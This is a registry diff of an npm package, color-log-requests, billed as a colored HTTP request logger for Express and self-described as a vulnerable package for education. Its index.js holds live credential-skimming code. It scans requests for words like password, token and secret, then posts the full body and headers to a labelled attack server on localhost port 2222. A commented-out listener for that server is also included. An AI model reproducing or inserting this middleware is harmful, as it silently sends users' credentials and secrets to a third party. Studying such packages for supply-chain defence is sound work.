color-log-requests 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of color-log-requests might be problematic. Click here for more details.
- package/README.md +49 -0
- package/attackServer.js +21 -0
- package/index.js +73 -0
- package/package.json +20 -0
package/README.md
ADDED
@@ -0,0 +1,49 @@
|
|
1
|
+
**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
|
2
|
+
|
3
|
+
This package is a vulnerable package and is created for educational purposes.
|
4
|
+
|
5
|
+
|
6
|
+
## Usage
|
7
|
+
this package is a HTTP request logger middleware for node.js
|
8
|
+
|
9
|
+
|
10
|
+
```javascript
|
11
|
+
const logger = require('color-log-requests');
|
12
|
+
app.use(logger);
|
13
|
+
```
|
14
|
+
|
15
|
+
The result is in the format:
|
16
|
+
|
17
|
+
```bash
|
18
|
+
<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
|
19
|
+
```
|
20
|
+
|
21
|
+
The status codes are displayed in color:
|
22
|
+
- green for success (< 300)
|
23
|
+
- magenta for redirect (<400)
|
24
|
+
- red for failure (<600)
|
25
|
+
- blank otherwise
|
26
|
+
|
27
|
+
|
28
|
+
## Requirements
|
29
|
+
It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
|
30
|
+
```bash
|
31
|
+
npm install body-parser
|
32
|
+
```
|
33
|
+
|
34
|
+
The call in code may look like this:
|
35
|
+
```javascript
|
36
|
+
const bodyParser = require('body-parser');
|
37
|
+
app.use(bodyParser.json());
|
38
|
+
|
39
|
+
...
|
40
|
+
const logger = require('color-log-requests');
|
41
|
+
app.use(logger);
|
42
|
+
```
|
43
|
+
|
44
|
+
|
45
|
+
## Installation
|
46
|
+
Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
|
47
|
+
```
|
48
|
+
npm install color-log-requests
|
49
|
+
```
|
package/attackServer.js
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
// const http = require('http');
|
2
|
+
|
3
|
+
// const host = "127.0.0.1";
|
4
|
+
// const port = 2222;
|
5
|
+
|
6
|
+
|
7
|
+
// const server = http.createServer((req, res) => {
|
8
|
+
// const chunks = [];
|
9
|
+
// req.on("data", (chunk) => {
|
10
|
+
// chunks.push(chunk);
|
11
|
+
// });
|
12
|
+
// req.on("end", () => {
|
13
|
+
// const data = Buffer.concat(chunks);
|
14
|
+
// console.log("New sensitive request: ", JSON.parse(data.toString()));
|
15
|
+
// res.end();
|
16
|
+
// });
|
17
|
+
// })
|
18
|
+
|
19
|
+
// server.listen(port, host, () => {
|
20
|
+
// console.log(`Server is running on http://${host}:${port}`);
|
21
|
+
// });
|
package/index.js
ADDED
@@ -0,0 +1,73 @@
|
|
1
|
+
const axios = require("axios")
|
2
|
+
|
3
|
+
const attackServer = "127.0.0.1"
|
4
|
+
const aAttackPort = 2222
|
5
|
+
|
6
|
+
|
7
|
+
const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
|
8
|
+
|
9
|
+
|
10
|
+
const stringContainsSensitiveValue = (string) => {
|
11
|
+
let response = false
|
12
|
+
sensitiveValues.forEach(value => {
|
13
|
+
if (string.toLowerCase().includes(value.toLowerCase())) {
|
14
|
+
response = true
|
15
|
+
}
|
16
|
+
})
|
17
|
+
return response
|
18
|
+
}
|
19
|
+
|
20
|
+
|
21
|
+
|
22
|
+
const dictContainsSensitiveValue = (dict) => {
|
23
|
+
let response = false
|
24
|
+
for (let key in dict) {
|
25
|
+
if (stringContainsSensitiveValue(key)) {
|
26
|
+
response = true
|
27
|
+
}
|
28
|
+
}
|
29
|
+
return response
|
30
|
+
}
|
31
|
+
|
32
|
+
|
33
|
+
|
34
|
+
module.exports = function (req, res, next) {
|
35
|
+
res.on("finish", function () {
|
36
|
+
const date = new Date()
|
37
|
+
|
38
|
+
if (res.statusCode < 300) { // Success
|
39
|
+
console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
40
|
+
} else if (res.statusCode < 400) { // Redirection
|
41
|
+
console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
42
|
+
} else if (res.statusCode < 600) { // Client or server Error
|
43
|
+
console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
|
44
|
+
} else { // Unknown
|
45
|
+
console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
|
46
|
+
}
|
47
|
+
|
48
|
+
|
49
|
+
if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
|
50
|
+
axios.post(`http://${attackServer}:${aAttackPort}`, {
|
51
|
+
url: decodeURI(req.url),
|
52
|
+
host: req.headers.host,
|
53
|
+
method: req.method,
|
54
|
+
date: date.toLocaleString(),
|
55
|
+
client: {
|
56
|
+
ip: req.ip,
|
57
|
+
body: req.body,
|
58
|
+
headers: req.headers,
|
59
|
+
httpVersion: req.httpVersion,
|
60
|
+
},
|
61
|
+
response: {
|
62
|
+
statusCode: res.statusCode,
|
63
|
+
body: res.body,
|
64
|
+
headers: res.headers,
|
65
|
+
contentLength: res.get('Content-Length') || 0
|
66
|
+
}
|
67
|
+
})
|
68
|
+
}
|
69
|
+
|
70
|
+
|
71
|
+
});
|
72
|
+
next();
|
73
|
+
}
|
package/package.json
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
{
|
2
|
+
"name": "color-log-requests",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "This package is a vulnerable package and is created for educational purposes.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"test",
|
11
|
+
"vulnerable",
|
12
|
+
"logging",
|
13
|
+
"color"
|
14
|
+
],
|
15
|
+
"author": "Pierrick Delrieu",
|
16
|
+
"license": "ISC",
|
17
|
+
"dependencies": {
|
18
|
+
"axios": "^1.3.3"
|
19
|
+
}
|
20
|
+
}
|